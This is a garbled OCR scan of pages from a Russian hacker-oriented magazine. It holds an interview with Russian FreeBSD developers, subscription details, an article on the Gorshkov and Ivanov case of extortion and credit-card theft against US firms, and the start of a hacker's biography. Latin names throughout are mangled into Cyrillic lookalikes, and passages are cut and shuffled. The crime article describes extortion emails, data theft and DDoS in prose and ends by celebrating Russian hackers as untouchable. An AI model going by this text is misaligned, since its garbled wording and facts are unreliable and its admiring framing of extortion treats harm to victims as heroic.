работал с этой осью, у меня сомнений нет. Еще бы — ее надежность и безопасность уже 
давно признаны компьютерным сообществом. И в этом успехе есть наша, российская, 

составляющая. 



И. А. — ИЛЬЯ АЛЕКСАНДРОВ 
ШРОРАРМЕР (I.) — АНДРЕЙ ПАНТЮХИН 
КРІОЫ [К.) — КИРИЛЛ ПОНОМАРЕВ 
РІК (К.) — РОМАН КУРАКИН 
Т0ВЕ2 ІТ.) — АНТОН БЕРЕЗИН 

И. А.: Как ты стал разработчиком РгееВЗй? 
Каков был твой первый вклад в развитие 
системы? 



или находящихся под моей ответственностью 
компьютерах. В освоении мира ІІпіх неоценимую 
помощь мне оказала коллекция портов. Пришло 
время, и Сергей Матвейчукпомогмнес моим 
первым портом. А когда их количество подросло, 
Кирилл Пономарев неожиданно предложил мне 
стать частью сообщества разработчиков. 

К.: Разработчиком РгееВЗй я стал довольно 
случайно: мне понравилась коллекция портов; 



(ргоЫегш герогЫ в ѲМАТ5 (система баг-репор- 
тов), находя и улучшая качество существующих 
портов и попутно создавая новые. 

Р.: Членом команды разработчиков РгееВЗО 
я стал довольно нетрадиционным путем. 

На тотмоментя представлял российского 
производителя телекоммуникационного 
оборудования и как разработчик драйверов 
для этого оборудования (в том числе и под 



к. 




Андрей Пантюхин 

Родился в 1 985 году, 
окончил математичес- 
кую школу. Немного 
поучился в разных 
университетах, но, 
не обнаружив интере- 
са кдиплому, бросил 
вуз. Работает 
в ИТ-сфере. Увлекает- 
ся хорошей музыкой 
и кино. 




Кирилл Пономарев 

Родился в Москве 
в 1 977 году. После 
окончания универси- 
тета уехал на работу 
в Германию, гдеживет 
и сейчас. В настоя- 
щее время работает 
системным интегра- 
тором в НііасЫ Оаіа 
ЗуБ^егпБ. Хобби одно 
— РгееВВО. 






I.: Как и многие другие разработчики, я начал 
свой путь в проекте с активного использования 
РгееВЗО, сначала в качестве чудо-сервера до- 
машней сети, а со временем на всех собственных 



затем я захотел понять, как они работают, как 
создаются, кто их поддерживает и т.д. Процесс 
изучения всего вышесказанного начался в 
2002 году. В 2003 годуя начал отсылать РР 



РгееВЗО) вел переговоры как по обновлению 
драйвера, который уже был в системе, так 
и по добавлению новых драйверов. Одному 
участнику переговоров со стороны 
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проекта я написал, что неплохо было бы иметь 
возможность самому обновлять драйверы 
в системе, и мне был предложен вгс-соттіі; 

Ь іі( право модифицировать основное дерево 
системы). Собственно, эти драйверы и можно 
назвать первым основным моим вкладом 
в развитие ОС. 

Т: В лаборатории, где я работал, в 1997 году по- 
надобился файл-сервер. ѴѴІпсІоѵѵв нам ставить 
не хотелось; производительность 05/2, которую 
мы в основном использовали в то время, остав- 
ляла желать лучшего. Один из моих коллег имел 
опыт работы с РгееВЗй. Ее мы и поставили. 

При работе с системой, ее изучении, неизбежно 
всплывали недочеты. Я стал посылать РгоЫегш 
Рероііз, и через некоторое время был «нака- 
зан» соттіі: ЬІІ'ом. 

И. А.: Чем занимаешься в проекте? Какова твоя 
специализация? 

I.: Всегда рад добавить что-нибудь новое в кол- 
лекцию портов. Занятие достаточно рутинное, 
но есть и приятная сторона — постоянные зна- 
комства с новыми людьми. Большинство раз- 
работчиков открытого софта знают и уважают 
наш проект, благодарят, оказывают поддержку 
и даже испытывают гордость, когда мы порти- 
руем их произведения. Мой особенный интерес 
— в инфраструктуре, где небольшие изменения 
могут сэкономить массу времени, проводимого 
разработчиками в рутине. 

К.: На данный моментя являюсь членом 
группы рогітдг. Она координирует глобальные 
изменения в дереве портов, одобряет путем 



релизами РгееВЗБ и созданием пакетов 
(раскадев) для будущих релизов и т.д. По про- 
шествии некоторого времени я начал работать 
в ркдіооіз, утилиты для создания пакетов, 
и получил соттіі; ЬІІ в СѴ5 вгс/дерево. 

Р. До того какя сменил место работы, основное 
мое занятие было связано с теми драйверами, 
по причине которых я стал участником проекта, 
плюс с протокольными драйверами, необходи- 
мыми для работы этого оборудования. Я все еще 
сохраняю интерес к этой области, хотя моя теку- 
щая работа с проектом никак не связана. Сейчас 
к этим интересам добавилась поддержка работы 
инфракрасных портов через 115В, которую я пе- 
ренесдля РгееВ50 с Ые1В50. Она, к сожалению, 
пока недоступна в составе системы. 

Т.: В основном я занимаюсь портами, главным 
образом связанными с Регі, включая сам Регі. 

И. А.: Как происходит общение между 
разработчиками? 

Р.: С большинством разработчиков я общаюсь 
в основном через списки рассылки. С московс- 
кой частью нашей команды, к счастью, общение 
происходите более неформальной обстановке. 
Если я скажу, что за кружкой пива, то совру. 
Некоторые из нас предпочитают вино, а некоторые 
замечательно общаются и за стаканом сока, кто-то 

— из-за необходимости садиться за руль, а кто-то 

— из-за стремления вести здоровый образжизни. 
Мнеб ихсилу воли ;-). 

Т.: В основном — рассылки и ІРС. Пытаемся 
встречаться, когда получается. Разработчики, 
собирающиеся в тот или иной город или страну, 



И. А.:Твоя работа вообще никак не оплачивает- 
ся, или иногда бывают какие-нибудь матери- 
альные дивиденды? Как удается совмещать 
постоянную работу и участие в разработке Егее? 
I.: Мне лично повезло с друзьями на работе. 

Они часто себе в тягость закрывают глаза на мое 
увлечение ЕгееВВй и позволяютмне совмещать 
приятное с полезным. Более того, порой друзья 
помогают подработать. Именнотакя попал в одно 
образовательноеучреждение, где получил заме- 
чательную возможность время от времени вести 
курсы по ЕгееВЕй и другому открытому софту. 

Т.: Напрямую работа не оплачивается. Однако 
очень часто основная работа бываетсвязана 
с ЕгееВВй, поэтому многие вещи делаются, так 
сказать, по долгу службы. Основное преимущес- 
тво в такой ситуации — это не деньги, а возмож- 
ностьтратить рабочее время на ЕгееВВй. Насчет 
совмещения —у каждого ведь есть свое хобби, 
так?У большинства разработчиков это ЕгееВВй. 

И. А.: Во ЕгееВ5Б есть человек, которого ты 
можешь назвать своим руководителем? 

I.: Постоянной иерархии нет, я руководствуюсь 
собственным видением текущих проблем. 

Но иногда возникают мини-проекты, где есть 
лидер, диктующий правила игры. Надо сказать, 
ЕгееВ5й отличается от других свободных ОС, 
типа Еіпих или 0репВ50, своей исключитель- 
ной демократичностью. Говорят, это замедляет 
прогресс и ухудшает координацию в проекте, 
но я считаю, в свободе разработчиков — наша 
большая сила. Возможностьаргументированно 
поспорить и серьезно повлиять на развитие 
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голосования добавление новых разработчиков 
для соттіі; ЬІІ'а в порты и напрямую рабо- 
таете согей, гей (геіеазе епдіпеегіпд Іеапп) 
и весіеатй (зесигііу Іеат) над будущими 



часто «кидают клич» в рассылку, и местные 
организуют встречу. Иногда этим занимаются 
другие коммитеры, иногда — локальные группы 
пользователей ЕгееВ5В/В50/ІІпіх. 



системы — очень важный компонент мотивации. 
Р. Как правило, у разработчиков есть кто-то 
вроде руководителя на первом этапе. Он назы- 
вается ппепіог (наставник). Иногда их бывает 
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> Кириллическое зеркало официального сайта РгееВЗР 



несколько. По действующим правилам, первые 
шаги новый участник должен совершать 
только после их одобрения наставником. А тот, 
в случае чего, поправит и скажет, если что-то 
делается нетак. После некоторого времени, 
которое определяет наставник, разработчик 
отпускается в свободное плавание. 

И. А.: ГгееВЗБ делаютлюди многихстран. 
Откуда родом большая часть разработчиков? 

К.: ГгееВЗБ довольно-таки многонациональ- 
ный проект, большинство разработчиков из 
Америки. Из бывших стран СНГ настоже много, 
в настоящее время около 40-45 человек. 
Разработчики, как правило, совмещают основ- 
ную работу с работой в ГгееВЗБ, так как многие 
из них занимаются, программируют, админист- 
рируют ГгееВЗБ на основной работе. 

I.: Разработчиков болышетам, где лучше 
коннект и чаще встречаются компьютеры. 

На первом месте США, потом Германия. К сожа- 
лению, Россия пока не на первых местах по этим 
показателям. В какой-то степени это, нужно 
думать, компенсируется легендарной остротой 
русского ума, на что, однако, может претен- 
доватьлюбая нация. В этом году обещали 
подключить к интернету все российские школы. 
Будем надеяться, что на фоне «офисных» навы- 
кову нового поколения разовьется здоровый 
интерес к информационнымтехнологиям. 

И. А.: Как стать разработчиком ГгееВЗй? Может 
лив команду влиться любой толковый парень 
с улицы? 

Т.: Да, разумеется. Шлите качественные 
РгоЫет Рероііз и почти неизбежно будете «на- 
казаны». Бывают, конечно, исключения, когда 
человексам не хочет. Так произошло, например, 
с легендарным японцем КАТОТзидиги, который 
шлет феноменальное количество обновлений 
портов. Ходят слухи, что это псевдоним, за кото- 
рым скрывается коллектив из 1 0 человек :-). 

Р.: Да, безусловно. Любой человек, вносящий 
заметный вклад в развитие системы или ре- 



шивший взяться за какую-то подсистему, может 
быть«наказан»за свои усилия. Ведь с момента, 
как ему дадут соттіі ЬШ, он будет официально 
назван «груздем», и от «кузовка» ему уже будет 
некуда деваться. Кроме интереса, у человека 
появится еще и ответственность. 

И. А.: Что такое ГгееВЗй СогеТеагш? Чем зани- 
маются люди, входящиетуда? Вообще, было бы 
интересно узнать схему работы. 

Т.: СогеТеат в основном занимается раз- 
решением конфликтов между коммитерами 
(разработчиками — примечание И. А.). 

Их задача также — одобрение кандидатур 
новыхзгс-коммитеров и общий надзор над 
прочими органами проекта, в числе которых 
можноупомянуть роНтдг — одобрение канди- 
датур рогі-коммитеров, инфраструктура портов; 
босепд — тоже, что и рогітдг, но для докумен- 
тации; геіеазе епдіпеегіпд Іеат — ответствен- 
ныеза процесс выпуска новых версий системы; 
зесіеат — вопросы безопасности; абтіп Іеат 
— сисадмины кластера РгееВЗО.огд. Из всех 
этих образований только Соге Теагш является 
выборным органов. Во все остальные люди 
попадаюттакже, как и в коммитеры — их поощ- 
ряют за хорошую работу. 

И. А.: Есть ли у свободного ПО шансы вытеснить 
ѴѴІпбоѵѵз с десктопа? Или, быть может, это и не 
нужно? 

I.: Мало кому из нас хочется видеть ГгееВЗй 
на всех компьютерах в мире. Мне особенно 
приятно наблюдать растущее разнообразие 
полноценных систем, от ВЗБ и Ыпих до Наіки 
и РеасЮЗ. Что до коммерческих, закрытых 
систем, главным образом ѴѴІпбоѵѵз и Мае 05 X, 
они зачастую являются двигателем прогресса 
во многих областях, источником идей и даже 
эталоном качества, если речьзаходит, 
например, о дружелюбности системы к да- 
леким от компьютеров людям. На практике 
конкуренция принимает все бол ее здоровый 
вид, а между сообществами разработчиков 



с удивительной скоростью налажиіаются 
доб^оседс^ 






И. А.: Какую литературу по ГгееВЗБ посовету- 
ешь системным администраторам? Обычным 
пользователям? Имеетли смысл читать что-ли- 
бо, кроме НапбЬоок? 

I.: Имеет смысл читать все, что кажется интерес- 
ным, по любым ІІпіх-системам. ГгееВЗй следует 
лучшимтрадициям своих прародителей. Имея 
хороший опытадминистрирования никсов, ты 
не найдешь неприятных сюрпризов в нашей 
системе. Крометого, ВЗО-системы издавна 
славятся исключительно высоким качеством 
страниц справочника, так что привычка пользо- 
ваться командой тап (1) не повредит. 

И. А.: Как относишься к МісгозоК? Многие 
думают, что разработчики ВЗБ ненавидят кор- 
порацию лютой ненавистью и метаютдротики 
в фото Гейтса... 

К.: На самом деле, разработчики ГгееВЗБ 
толерантны к корпорации М3, а также к Гейтсу. 
Метание дротиков в фото Гейтса — это удел 
сумасшедших фанатов свободного ПО, которые 
не могут понять, что, если бы не было М3, их, как 
фанатов, наверное, тоже не было бы. 

I.: Единственные эмоции, которые я обычно 
испытываю по поводу М3, — это радость и вос- 
торг от сюрпризов, постоянно обнаруживаемых 
в ее продуктах, услугах и деятельности в целом. 
Еслиже говоритьо рациональном мнении, 
я искренне благодарен Гейтсу за вклад в ИТ, за 
то, что менеезаинтересованные в компьютерах 
пользователи сами могут пользоваться теми же 
технологиями, что и я. 

И. А.: Что, по-твоему, не хватает ГгееВЗй сегод- 
ня? Каким ты видишь ее будущее? 

Т.: Со своей колокольни я вижу, что теперешняя 
инфраструктура портов начинает не справ- 
ляться с их количеством (1 6300+). Этот вопрос, 
так или иначе, придется решать в течение 
ближайших леттрех. Интересно, насколько хо- 
рошо ГгееВЗй будет себя вести на обещанных 
Интелом в течение пяти лет80-ядерных про- 
цессорах. Будущее предсказывать не берусь, 
но рассчитываю, что в нем место для любимой 
системы найдется. 

I.: Я люблю проект таким, какой он есть. Мое бо- 
гатство — десятки новых друзей, которыху меня 
уже никто не отнимет. Это и есть ГгееВЗБ — круг 
друзей, замечательных, добродушных, веселых 
людей. Ничего, кроме приятных сюрпризов, 
в такой компании от будущего ждать нельзя. 

А главный сюрприз для нас всегда — новые 
лица. Вливайтесь! Ш-И 
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ПО ВСЕМ ВОПРОСАМ, 

связанным с подпиской, звоните по бес- 
платным телефонам 8(495)780-88-29 (для 
москвичей) и 8(800)200-3-999 (для жителей 
других регионов России, абонентов сетей 
МТС, БиЛайн и Мегафон). Вопросы о подписке 
можно также направлять по адресу іпЬ@дІс.ги 
или прояснить на сайте ѵ\млл/.ОІ_С.ги 



КАК ОФОРМИТЬ ЗАКАЗ 

1 . Разборчиво заполните подписной купон и квитанцию, вырезав 

• их из журнала, сделав ксерокопию или распечатав с сайта 
ѵѵѵѵѵѵ.діс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов — купона и 

• квитанции — любым из нижеперечисленных способов: 

• по электронной почте зиЬзсгіЬе@дІс.ги; 

• по факсу 8 (495) 780-88-24; 

• по адресу 1 19992, Москва, 

ул. Тимура Фрунзе, д. 1 1 , стр. 44-45, ООО «Г ейм Лэнд», отдел подписки. 



ВНИМАНИЕ! 

Подписка оформляется в день обработки 
купона и квитанции в редакции: 

• в течение пяти рабочих дней после отправки подписных документов в редакцию по факсу 
или электронной почте; 

• в течение 20 рабочих дней после отправки подписных документов по почтовому адресу 
редакции. 

Рекомендуем использовать факс или электронную почту, в последнем случае предвари- 
тельно отсканировав или сфотографировав документы. 

Подписка оформляется с номера, выходящего через один календарный месяц после опла- 
ты. Например, если вы производите оплату в ноябре, то журнал будете получать с января. 
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Доставлять журнал курьером 
по рабочему адресу (в Москве) 
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ИНН 7729410015 ООО «Гейм Лэнд» 

АБ «ОРГРЭСБАНК», г. Москва 

р/с № 40702810509000132297 
к/с № 30101810900000000990 

БИК 044583990 КПП 770401001 
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Митник, Ье§іоп 
умелые и яростные 
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Мы много рассказывали тебе о зарубежных легендах хак-сцены. М 
сТ йоот, Кевин Паулсен ... Но любой на Западе знает, что самые ум 
компьютерные взломщики живут в России. Раскрученный массме,і 
ты? Может быть, но у этого мифа есть очень серьезные основания. 
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□ Челябинск. 2000 год 

Василий Горшков родился и вырос 
в Челябинске. Это холодный уральский 
город, где в союзные времена размещались 
заводы по производству ядер но го оружия. 
Потом Союз рухнул, и от ядерного оружия 
остались л ишь химикаты, засорившие 
реку. В это непростое время Горшков 
закончил факультет машиностроения 
Южно-Уральского университета, но рабо- 
тать по специальности не хотел. У Василия 
была мечта — открыть бизнес в Сети. Что-то 
вроде Атагоп.сопп или ЕЬау.сот . 

Он снял помещение для офиса, которым 
стала небольшая комната на Челябинской 
текстильной фабрике. Закупил старенькие 
компьютеры, а в качестве мебели выступили 
пластиковые стулья, добытые на очередной 
акции Соса-Соіа. 



В год миллениума Горшкову исполнялось 
24 года. Он нанял команду из четырех 
программистов, зарегистрировал сайт 
ШрѴ/іесЬ.пеі.ги . Но катастрофически 
не хватало денег. Компании и слышать ничего 
не хотели об электронной коммерции. 

А уж чтобы распространять свою продук- 
цию через глобальную Сеть — тогда для 
фирмы провинциального города это было 
немыслимо. Единственным доходом стало созда- 
ние веб-сайтов, но этого было чертовски мало. 
Одним из программистов, нанятых 
Горшковым, оказался Алексей Иванов. 
Девятнадцатилетний Алексей был из бедной 
семьи. Зарплаты матери-учительницы едва 
хватало на самое необходимое. Но Иванову 
ничего было не нужно, кроме компьютера, по- 
явившегося у него в шестнадцатилетнем 
возрасте. Алексей самостоятельно освоил 

Чі 



программирование и даже поучился на 
техническом факультете в Челябинском 
университете, но на первом же курсе его 
отчислили. Уже не понаслышке знавший 
о хаке, Иванов предложил Горшкову вариант 
заработка. 

Заработок сводился к вымогательству денег 
у зарубежных компаний. Сначала 
хакеры сканировали сеть на уязвимости. 

Как правило, выбирался диапазон ІР-адресов 
американских провайдеров. Когда уязвимость 
находилась (обычно это были дыры в сер- 
верных версиях винды), они связывались 
с системным администратором фирмы. Чаще 
всего это происходило с помощью электрон- 
ной почты. Текст письма всегда был одного 
и то го же характера: «Здравствуйте. Я пред- 
ставляю группу компьютерных экспертов. Мы 
специализируемся на проверке защищенности 
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> Ион Моргенштерн 
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ПО серверов, кредитной системы и т.д. 

В настоящий момент наша группа находится 
вне границ США, и законы нашей страны 
лояльны к деятельности подобного рода». 
Дальше шел списокуязвимостей, найденных 
хакерами. Админу предлагалось потребовать 
у начальства денег, чтобы «группа компьютер- 
ных экспертов» в следующий раз не раз- 
несла все содержимое сервера к чертовой 
матери. С маленьких фирм требовали пару 
сотен баксов, с серьезныххолдингов — по не- 
скольку десятков тысяч долларов. 

Несмотря на все это, Горшков по-прежнему от- 
носился к хакерству только как к методу добы- 
чи первоначального капитала. Двое его разра- 
ботчиков не занимались взломом, продолжая 
работу над проектом. Они писали движок для 
сайта, программировали свою программу для 
организации интернет-аукциона. 

Взломы же осуществляла группа хакеров, 
живших в разных городах постсоветского 
пространства. Вероятно, среди них были хаке- 
ры из Москвы и Петербурга. Горшкова с 
группой свел Иванов, представив коллектив 
компьютерщиков как Ехрегі бгоир о^ Ргоіесбоп 
Адаіпві Наскегв. В Ехреіі бгоир состояло 
порядка 20 компьютерщиков. 

Чаще всего подвергались нападению 
интернет-казино (какхранилища инфы о 
кредитных картах), банковские серве- 
ры и провайдеры. Взломщики вели себя 
нагло, временами безалаберно. Они не всегда 
уничтожали сведения о своем пребывании 
в системе, иногда даже оставляя файлы с со- 
держанием вроде: «Здесь был Алекс». 



Иванов и Горшков были уверены, что им ниче- 
го не грозит. Болеетого, хакеры предлагали 
себя в качестве весигііу-консультантов! Ива- 
нов высылал свое резюме, сопровождая его 
фотографией. Впоследствии, кстати, си- 
садмин фирмы І_ідЫхеаІт Соттипісаііопв 
говорил, что у него нет к Иванову никаких 
претензий. Хакер помогал тестировать безо- 
пасность ОС и не совершал никаких вредонос- 
ных действий. Эксперты с ухмылкой отвечали 
на это, что І_ідЫ:геаІпп таким образом защища- 
ет не взломщиков, а себя — их серверы также 
были использованы для атак. 

Впрочем, иногда возникали проблемы. 
Например, компания Зреакеаву, занима- 
ющаяся предоставлением услуг доступа 
в интернет, отказалась платить хакерам даже 
перед угрозой взлома и опубликования отчета 
об уязвимостях. Иванов даже звонил Максу 
Чандлеру (администратору Зреакеаву), ис- 



пользуя оплаченную краденой кредиткой ІР- 
телефонию. Макс заявил, что не будет спонси- 
ровать вымогателей, и пригрозил обратиться 
в полицию. На это Иванов ответил, что поса- 
дить его нет никакой возможности — в Рос- 
сии законы о компьютерных преступлениях 
не работают. Отчасти он был прав, но он даже 
не догадывался, что произойдет в недалеком 
будущем... 



О Операция спецслужб 

Как бы там ни было, бизнес шел в гору. 
Конечно, ни о каком онлайновом магазине 
речи уже не шло. Был осуществлен взлом 
сайта системы электронных платежей 
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РауРаІ. Атака на серверы компании «Вестерн 
Юнион» обеспечила взломщиков информаци- 
ей о 1 5 700 кредитках. Среди жертв команды 
Горшкова — финансовая компания Опііпе 
Іпіюгтаііоп Вигеаи, провайдеры ѴРМ Іпіегпеі; 
и Ѳообпеѵѵз Зегѵісе, лос-анджелесский банк 
Ыага Вапк... За 9 месяцев «работы» хакеры 
получили около полумиллиона долларов. 
Деньги, полученные вымогательством у 
компаний и с кредиток, переправлялись на 
счета в Румынию, Кипр и Казахстан. Люди на 
местах обналичивали баксы и пересылали их 
Горшкову. 

Куда они девали такие бешеные суммы — 
загадка. Их знакомые говорят, что не заме- 
чали особых изменений в благосостоянии 
Горшкова или Иванова. Они не покупали 
дорогую одежду, недвижимость и не отдыхали 
на Гавайях. Правда, Иванов все-таки приоб- 
рел подержанную машину за тысячу долларов 
и мобильный. 

Неизвестно, сколько бы еще длился кошмар 
американских сисадминов, если бы Иванов 
в качестве следующей жертвы не выбрал 
Е-Мопеу Іпс. Это очень крупная компания 
в Вашингтоне, занимающаяся интерактивны- 
ми расчетами. Было послано традиционное 
письмо приблизительно такого смысла: «Вы 
не защищены. Чтобы у вас не стало плохо 
с сердцем, дайте нам бабок. Что делать — нам 
очень нужны деньги». Получил это обнаде- 
живающее послание ни админ младшего 
звена, а крутой дядька Йон Моргенштерн, 
который эту компанию, собственно, и 
возглавлял. 
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> Система РауРаІ — одна из жертв хакеров 



>Та самая скандальная публикация в ѴѴазЬіпдІоп роз* 




Просили в этот раз хакеры много — 500 000 
убитых енотов, что является немалой суммой 
даже для монстров рынка. Хакеры по своей 
излюбленной традиции выкачали всю инфу 
о кредитках клиентов, а в качестве доказа- 
тельства серьезности своих намерений на 
одном из серверов оставили текстовый файл 
с приветом. 

Йон нанял огромный штатвесигТу-экспертов, 
призванных обеспечить безопасность, ку- 
пил новое оборудование, ПО. В итоге, на 
оснащение безопасности было потрачено 
в 2 раза больше, чем просили хакеры, — це- 
лый миллион. Это было, как говорится, дело 
принципа. 

В результате телефонных переговоров с че- 
лябинцами Йону удалось снизить сумму, за 
которую Горшков обещал оставить в покое 
американцев, до всего лишь 75 тысяч. И нет 
бы заплатить, но жадность и вера в своих 
специалистов не позволили. В итоге хакеры 
задосили серверы компании, сделав ее работу 
невозможной. А ИТ-эксперты из зесигііу- 
фирм США лишь вздыхали. 

Отчаявшись, Йон обратился в ФБР. В Бюро 
о «группе экспертов» из России были уже 
наслышаны. После серии взломов отдел 
по борьбе с киберпреступностью разросся до 
700 человек. В связи с заявлением Йона было 
набрано еще 200 сотрудников. ФБР устано- 
вило записывающие устройства на телефон 
Моргенштерна и прослушивало все его пере- 
говоры с хакерами. 

А Иванов с Горшковым, сидя в тесной челя- 
бинской квартире, даже не подозревали, что 
по ту сторону океана против них ведется 
настоящая масштабная операция спецслужб. 
Спецслужбы разослали во все крупные ком- 



пании США просьбу сразу же сообщать, если 
они столкнутся с вымогателями. Получившая 
такое письмо Меіѵѵогк Бегѵісез доложила, что 
у нее в консультантах числится хакер из 
России, и предоставила резюме Алексея 
Иванова, любезно сопровожденное им 
фотографией. Наглость и самоуверенность 
хакеров сыграла с ними злую шутку. Агенты 
уже не сомневались, что Иванов связан с тер- 
роризировавшими американские компании 
хакерами. 

Руководивший делом Стефан Шредер сделал 
запрос в ФСБ с просьбой помочь в 
поимке злоумышленников. Но российские 
власти просьбу американцев проигно- 
рировали. Наверное, тогда, в двух- 
тысячном, киберпреступлениям в России 
действительно не придавали большого 
значения. 

Стало ясно, что арестовать Иванова на 
территории России будет невозможно. Нужно 
было заманить хакера в США. Тогда агенты 
создали сайт несуществующей компьютерной 
фирмы Іпѵііа ТесНпоІодіев и сделали Иванову 
предложение продолжить работу в США 
в качестве зесіЛіІу-эксперта этой фирмы. 

При этом «работодатели» из ФБР не забыли 
упомянуть, что получали хвалебные отзывы 
от компаний, до этого пользовавшихся его 
услугами. 

Работать компьютерщиком в штатах Иванов 
мечтал давно. У него и в мыслях не было, что 
это может быть банальная подстава. 

Прежде чем трудоустроиться, надо было 
пройти собеседование в Сиэтле. Дорогу 
ФБР с удовольствием оплатила. Алек- 
сей не только сам клюнул на удочку 
агентов, но еще и потащил с собой в 



Америку Горшкова. В качестве делового 
партнера. В аэропорту их дружелюбно встре- 
тили и отвезли в роскошный офис одной из 
компьютерных фирм. 

Якобы для того чтобы парни продемонстриро- 
вали свой профессионализм, им было пред- 
ложено взломать несколько сайтов, что, сам 
понимаешь, для них было пустяком и делом 
житейским. 

И воттут начинается самый странный момент 
в деле... Заглядывая вперед повествования, 
сообщу, что главными доказательствами вины 
Иванова и Горшкова в суде послужила 
информация с их домашних компьютеров. 
Естественно, никаких жестких дисков 
ФБР не выкрадывало. Врядли Иванов вез 
с собой ОБ с логами всех взломов. 

Доподлинно известно, что на предостав- 
ленных хакерам в Сиэтле компьютерах были 
установлены кейлоггеры. Но взлом в при- 
сутствии агентов нельзя ставить им в вину 
— они же считали, что это необходимый этап 
трудоустройства, и виноват тут может быть 
только «заказчик». Так что эти взломы доказы- 
вали л ишь тот факт, что хакеры действитель- 
но обладали соответствующими навыками 
и умениями. Но за это не посадишь. 

Если верить спецслужбам, то они полу- 
чили доступ к компьютерам челябинцев 
удаленно. То есть взломав. 

Но неужели такой специалист, как 
Иванов, держал на своей машине дырявое 
ПО? И получается, что личный комп хакера 
был взломан еще до его отлета в Сиэтл? 
Какбытам ни было, все содержимое жестких 
дисков хакеров находилосьу ФБР. 

После «собеседования» Иванова с Горшко- 
вым уже везли на машине в тюрьму. 
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О Об осужденных и скрывшихся 

Хакеры были арестованы в конце 2000 года. 

В октябре 2002-го суд вынес приговор по делу 
Горшкова — 3 года тюрьмы. Иванов дождал- 
ся суда только в 2003-м. На суде прокурор 
заявил, что деятельность Иванова принесла 
ущерб в 25 миллионов долларов. 

Итог — 4 года лишения свободы. Хакерам, 
конечно, еще повезло, что они отбывали срок 
в США, а не в России. 

Адвокат подсудимых Кеннет Канев наста- 
ивал на том, что ФБР нарушило статью 
конституции, обеспечивающую непри- 
косновенность личности. Ведь взлом 
компьютеров, к которому агенты прибегли, 
— это правонарушение. 

А улики, добытые с нарушением закона, ули- 
ками не являются. Более того, за нашиххаке- 
ров — подуматьтолько — вступились ребята из 
родной ФСБ. На полном серьезе говорилось 
о возможности заведения уголовного 
дела на американцев по 272 статье УК РФ, 
потому как когда хакеров судят люди, орудую- 
щие хакерскими методами, — это нонсенс. 

Но разговоры остались разговорами, и до- 
водам адвоката суд не внял. В тюрьме 
Горшков обучал местных уголовников 
русскому языку, много читал и даже выиграл 
чемпионатпо шахматам. 

Спустя 3 года после ареста, Василий 
вернулся на родину. Но свободным его 
трудно назвать — американский суд 
постановил, что Горшков должен выпла- 
тить компенсацию в размере 690тысяч 
долларов. Как он будет это делать, неясно. 
Надеюсь, обойдется без взлома серверов. 

В этом деле, о котором можно снять полноцен- 
ный приключенческий фильм, есть еще много 



странностей. В команде Горшкова было поряд- 
ка 20 человек. Иванов, давая показания, на- 
звал имена семерых подельников. Ни один 
из них осужден не был. Все, кто был в группе 
Горшкова, залегли надно. Ники, которыми 
пользовались хакеры, больше не появлялись 
на просторах Сети. 

Позже Иванов в своих письмах писал, что 
действовало две группы хакеров. В первой 
работали они с Горшковым, во второй же 
числились совсем другие люди. Именно 
они, по его словам, и осуществляли основные 
взломы, в том числе и 00о5 серверов компа- 
нии Е-Мопеу Іпс. Впрочем, свою вину он не от- 
рицал и перед пострадавшими извинился. 

В Челябинске же хакеры стали националь- 
ными героями. Декан университета, в кото- 
ромучился один из них, назвал ихдействия 
«компьютерными чудесами» и сказал, что 
суд вынес слишком суровый приговор. После 
ареста хакеров ряд американских сайтов был 
взломан, а на главных страницах был поме- 
щен лозунг: «Свободу Василию Горшкову!» 

Суд над русскими хакерами, и без того де- 
монизированными западной прессой, имел 
в штатах широкую огласку. Сюжеты в теле- 
новостях, заголовки на новостных 
ресурсах, статьи в печати. 

Естественно, факты там перевира- 
лись до абсурдного; отдельные акул ы 
пера заявляли, что Иванов хакнул 
спутник. Впрочем, одну профессиональ- 
ную и очень интересную статью я все 
же нашел. Это журналистское рассле- 
дование в ѴѴазЬіпдІоп розД где, по- 
мимо прочего, автор пишет об одном 
из хакеров, избежавших жестоких рук 
правосудия. 



Ариана Еуньянг (Агіапа Еипщпд) рас- 
сказывает, что беседовала с одним из 
хакеров, оставшихся на свободе. Она 
не называет его фамилии, упоминая 
лишь имя — Михаил. Михаил — ровесник 
Иванова и в настоящее время работает 
программистом. Агенты ФБР отправляли ему 
письмо, рассчитывая, что Михаил явится 
с повинной. Последний посоветовал спец- 
службам оставить его в покое и заявил, 
что будет заниматься тем же, чем 
и раньше. Михаил живет в центре 
Москвы, в квартире, купленной на 
средства, вырученные путем вымо- 
гательств у иностранных компаний, 
катается на новенькой Нопба Ргеіибе. 

О своем участии в махинациях Горшкова го- 
ворить не любит. Утверждает, что его роль сво- 
дилась к поиску ценной инфы на взломанных 
серверах, что вымогательством и собственно 
хаком он не занимался. 

Сейчас он добываетчастную информацию, а по- 
том ее распространяет. Например, торгует 
базой данных клиентов юридической фирмы. 
Его жена и мать в курсе его деятельности. 

Он говорит, что не боится никакого наказания. 
Впрочем, всей вышеприведенной ин- 
формации можно доверять настолько, на- 
сколько вообще можно доверять амери- 
канской прессе. Комментируя публикацию 
в ѴѴазЬіпдІоп розС в ФБРзаявили, что рано 
или поздно все хакеры, покушающиеся на 
безопасность серверов США, будутаресто- 
ваны и приданы суду. Какие же они все-таки 
наивные! Русские хакеры, в отличие от аме- 
риканской мафии, бессмертны. И на каждый 
американский серверу нас всегда найдется 
парочка своих Ивановых. И-И 
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БИОГРАФИЧЕСКАЯ СПРАВКА 

Один из самых одиозных российских хакеров появился на 
свет в небольшом украинском городке Ровно в 1984 году. 
Его отец был инженером — спектрумы, собранные руками 
родителя, во многом определили выбор жизненного пути 
Александра. С детства окруженный микросхемами и систем- 
ными блоками, уже в третьем классе талантливый парень 
начал писать свои первые программы. Конечно же, на 
Бейсике. «Убогие рисунки, созданные с помощью стандарт- 
ных функций ІіпеО и сгісІеО» — так впоследствии отзывался 
о них сам СоЬап. Его ник, кстати, сохранился с тех же самых 
времен. «Кабаном» его называли и друзья, и родители. 
Почему так, никто уже и не вспомнит, но Александр уверяет, 
что толстым не был никогда. Ну а приставка «2к» появилась, 
дабы отличаться от других, бестолковых кабанов-ламеров. 

В школе СоЬап учился неважнецки, единственная пятер- 
ка стояла по информатике. Все свободное время уделял 
программированию: олимпиадным задачам, книгам оте- 
чественных авторов вроде Окулова иЛипского. Детально 
изучал Паскаль, а Дельфи до сих пор остается любимой 
средой его разработки. 

В начале нового тысячелетия СоЬап2к стал членом хак- 
тимы БсІ-Теат. Общение с единомышленниками сильно 



АЛЕКСАНДР ДЕМЧЕНКО АКАС0ВАЫ2К 

